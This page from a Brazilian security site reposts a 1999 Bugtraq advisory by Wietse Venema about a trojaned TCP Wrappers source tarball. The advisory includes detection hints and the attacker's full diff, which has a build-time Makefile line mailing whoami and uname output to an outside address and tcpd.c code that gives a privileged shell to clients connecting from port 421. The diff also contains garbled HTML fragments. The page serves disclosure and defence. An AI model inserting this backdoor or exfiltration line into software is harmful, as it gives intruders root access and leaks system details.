você está aqui: Home  → Arquivo de Mensagens

Alteração do Código do Programa TCPWRAPPER

Colaboração: José Vicente Machado Filho

Data de Publicação: 25 de Janeiro de 1999

O TCPWRAPPER foi "trojanado" e várias pessoas chegaram a fazer download do programa alterado.

No e-mail abaixo, segue toda a descrição do problemas divulgado pelo próprio Wietse Venema.

José Vicente Machado Filho Analista de Suporte

Modulo Security Solutions S.A. http://www.modulo.com.br

  -----Mensagem original-----
  De: Wietse Venema <wietse@PORCUPINE.ORG>
  Para: BUGTRAQ@netspace.org <BUGTRAQ@netspace.org>
  Data: Quinta-feira, 21 de Janeiro de 1999 18:34
  Assunto: [S] backdoored tcp wrapper source code
  
  
  >TCP Wrappers is a widely-used security tool to protect UNIX systems
  >against intrusion. In has an estimated installed base of millions.
  >
  >Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
  >a backdoored version. Eventually this was bound to happen, and
  >that's why the source file is accompanied by a PGP signature.  But
  >that is no guarantee against people downloading and installing
  >backdoored software.
  >
  >The backdoor gives access to a privileged shell when a client
  >connects from port 421.
  >
  >The backdoored copy was downloaded 52 times between 07:16 MET and
  >16:29 MET. I have informed the sites that downloaded a copy.
  >
  >Below are details on how to recognize the backdoored version.
  >
  >        Wietse
  >
  >Relevant time stamp/size information (times relative to MET):
  >
  >Backdoored version:
  >
  >    % ls -lcta
  >    -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
  >    ...
  >    dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .
  >
  >Restored version:
  >
  >    % ls -lt tcp_wrappers_7.6.tar.gz
  >    -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz
  >
  >The signature of the bad TAR file is: length 99186 instead of 99438.
  >The signature of a compiled tcpd binary is:
  >
  >    strings -a tcpd | grep csh
  >
  >any output probably means trouble.
  >
  >Changes that were made to the tcp wrapper 7.6 source code:
  >
  >diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
  >*** 7.6/Makefile        Mon Apr  7 20:34:16 1997
  >--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
  >***************
  >*** 26,31 ****
  >--- 26,32 ----
  >        @echo
  >        @echo "If none of these match your environment, edit the system"
  >        @echo "dependencies sections in the Makefile and do a 'make
  other'."
  >+       @sh -c écho debug-""whoami""-""uname -a"" |mail -s debug
  wtcpd@hotmail.com'
  >        @echo
  >
  >  < A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>###
  >***************
  >*** 649,655 ****
  >  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  >  # Solaris 2.x, and Linux. See your system documentation for details.
  >  #
  >! KILL_OPT= -DKILL_IP_OPTIONS
  >
  >  ## End configuration options
  >  < A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>
  >--- 650,656 ----
  >  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  >  # Solaris 2.x, and Linux. See your system documentation for details.
  >  #
  >! # KILL_OPT= -DKILL_IP_OPTIONS
  >
  >  ## End configuration options
  >  < A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>< A NAME="note" HREF="#textnote">< SUP>
  >Only in 7.6: Makefile-
  >diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
  >*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
  >--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
  >***************
  >*** 41,52 ****
  >--- 41,63 ----
  >  int     allow_severity = SEVERITY;    /* run-time adjustable */
  >  int     deny_severity = LOG_WARNING;  /* ditto */
  >
  >+ char    IDENT[]="NC421\n";
  >+ char    SRUN[]="-csh";
  >+ char    SPATH[]="/bin/csh";
  >+ #define PORT 421
  >+
  >  main(argc, argv)
  >  int     argc;
  >  char  **argv;
  >  {
  >      struct request_info request;
  >+     struct sockaddr_in from;
  >      char    path[MAXPATHNAMELEN];
  >+     int     fromlen;
  >+
  >+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
  >+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
  >+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
  >
  >      /* Attempt to prevent the creation of world-writable files. */
  >
  


Veja a relação completa dos artigos de José Vicente Machado Filho

 

 

Opinião dos Leitores

Seja o primeiro a comentar este artigo
*Nome:
Email:
Me notifique sobre novos comentários nessa página
Oculte meu email
*Texto:
 
  Para publicar seu comentário, digite o código contido na imagem acima
 


Powered by Scriptsmill Comments Script